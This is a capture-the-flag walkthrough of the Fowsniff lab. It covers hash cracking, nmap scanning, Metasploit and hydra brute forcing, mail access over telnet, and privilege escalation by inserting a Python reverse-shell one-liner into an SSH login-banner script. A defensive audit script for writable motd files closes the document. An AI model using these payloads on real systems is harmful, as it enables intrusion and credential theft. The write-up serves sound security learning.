CTF’s walkthrough will show you how to… | by Hani Anis Bouzid | Medium
Reconnaissance

Reconnaissance is an important step in the application assessment process and it is almost always an easy win, whether it’s discovering more attack surfaces or obtaining critical data with minimal complications.

First view
I prefer to open the IP in a browser to get a first look at the victim. If it doesn’t open, it means the target isn’t a website or it doesn’t use the default ports for HTTP. In either case, we’ll run a scan with nmap later. The website appears to be out of service due to a data breach which exposed employees’ usernames and passwords, as well as their Twitter account being hacked.

[Figure: Fowsniff Corp website is out of service.]

After doing some research on Twitter, I discovered the company’s official Twitter account. According to tweets, the site administrator is maybe stone@fowsniff. The hackers shared a dumped list of passwords at pastebin.com.

[Figure: Hackers deployed a link containing the usernames and passwords of employees.]
[Figure: Twitter, where hackers mock the company by asking if the hash is for the sysadmin.]

Download files

Download the dumped file with the following command, or just copy it and paste it somewhere on your local computer.

[Figure: Download dumped file with wget.]

Make a list of users

Before we begin cracking, we’ll filter our file to obtain a list of usernames and hashes from the dumped data.

[Figure: Make a list of usernames.]

Make list of passwords

Now filter your file so that only hashes remain. With the following command, you can see the password being cracked while the process is running.

    hashcat -m0 -a 0 /path/to/dictionary/MyDictionary.txt

You can also crack hashes by searching for them on Google or by doing it in hash killer website.

[Figure: Start cracking hashes with hashcat.]

    hashcat -m0 --show -o

[Figure: Cracked hash.]

Gather More Information with nmap

To gain time and productivity, you can run nmap while hashcat cracks the hashes. To check for open ports and services, run the following command.
    nmap -sT -sV -n -F -vv -oN ports.lst

Once we’ve identified the open ports and the services that run on them, we can continue our scan to look for detailed version numbers on each service running on each port, so we can experiment with different Metasploit auxiliary modules to find potential exploits.

[Figure: nmap scanning result.]

Gaining Access

Metasploit

We must seek out valid credentials by using Metasploit: “Perhaps an employee who hasn’t changed his password yet”. Type msfconsole in your terminal to run Metasploit. Use the search command to search for the pop3 module. Type the appropriate index number or the full path to the module to select scanner/pop3/pop3_login.

[Figure: Metasploit.]

Type show options to see what options are available for /pop3_login. Now set the appropriate options for the module, including the username and password list, as well as the host IP target, then run.

    msf6 auxiliary(scanner/pop3/pop3_login) > set rhost
    msf6 auxiliary(scanner/pop3/pop3_login) > set USER_FILE user.txt
    msf6 auxiliary(scanner/pop3/pop3_login) > set PASS_FILE password.txt
    msf6 auxiliary(scanner/pop3/pop3_login) > run

We have a valid login.

[Figure: Metasploit running pop3_login scanner module.]

Connect to this employee mail server via telnet using that valid login; the commands are listed below.

    telnet
    USER
    PASS
    STAT    # return number of messages in the queue and total size in bytes
    LIST    # list of waiting messages
    RETR    # print email
    DELE    # delete email
    RSET    # cancels all destruction commands during the session
    QUIT

After logging in, I looked through the victim’s email list and discovered that the system administrator had sent out an email to all employees in which he gave them instructions and created a default login and password for them to use on an ssh server. Use RETR 1 to print the first email on screen.
After getting the ssh password from that email, I assumed that the first user had not yet changed his password and was using the default password, but this was not the case, so I had to use hydra to brute-force ssh using the default password with my dumped user list. Type the command below to test the password with hydra.

    hydra -L user.txt -p ” -t numberOFThreads ssh

[Figure: hydra testing password.]
[Figure: ssh to Fowsniff shell.]

To be honest, I struggled a little bit to figure out how to escalate the privilege; there were so many files to check, but in the end, I did after running a search command that I’ll show you later. I found a script that displays a banner identical to the one displayed during ssh login. To verify, I used the grep command to search the etc folder for a configuration file which uses that script, then exploited this bad configuration in my favor. Run the groups command to see what group the user belongs to, then search for files which the user can execute using the find command with those arguments: find -group – and -perm.

[Figure: find command.]

The script below displays the same ssh login banner.

[Figure: cube script.]

According to the 00-header file in the /etc/update-motd.d folder, when a user connects to the machine through SSH, the /opt/cube/cube.sh file is called, so we can edit the banner to run malicious code. Add this line to the cube.sh file.

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((,));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[Figure: editing cube.sh file.]

Set up a listener on our local machine. Now restart your ssh session.
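
A defensive check for the misconfiguration described above, as an added example that is not part of the original walkthrough: it walks the login-banner scripts in /etc/update-motd.d and flags any script, or any file a script references, that is group- or world-writable. The function names are hypothetical, and extracting referenced paths with a simple pattern match is an assumption that suits short banner scripts.

```shell
#!/bin/sh
# Added example: audit login-banner scripts for files that non-root users can edit.
# Default directory is /etc/update-motd.d, the one named in the walkthrough.

# is_loosely_writable FILE: succeed if FILE is group- or world-writable.
# -L follows symlinks so a link such as /bin/sh is judged by its target.
is_loosely_writable() {
    perms=$(ls -ldL -- "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        ?????w????|????????w?) return 0 ;;   # group-write or other-write bit set
        *) return 1 ;;
    esac
}

# audit_motd_dir [DIR]: print one finding per line; return 1 if any were found.
audit_motd_dir() {
    dir=${1:-/etc/update-motd.d}
    found=0
    for script in "$dir"/*; do
        [ -f "$script" ] || continue
        # Absolute paths mentioned in the banner script (e.g. /opt/cube/cube.sh).
        targets=$(grep -oE '/[A-Za-z0-9._/-]+' "$script" | sort -u)
        # Check the banner script itself as well as everything it references.
        for target in "$script" $targets; do
            [ -f "$target" ] || continue
            if is_loosely_writable "$target"; then
                echo "FINDING: $script runs at login and uses writable file $target"
                found=1
            fi
        done
    done
    return "$found"
}
```

Call `audit_motd_dir` with no argument to check the live directory; a finding is fixed by making the file owned by root and removing the group and other write bits.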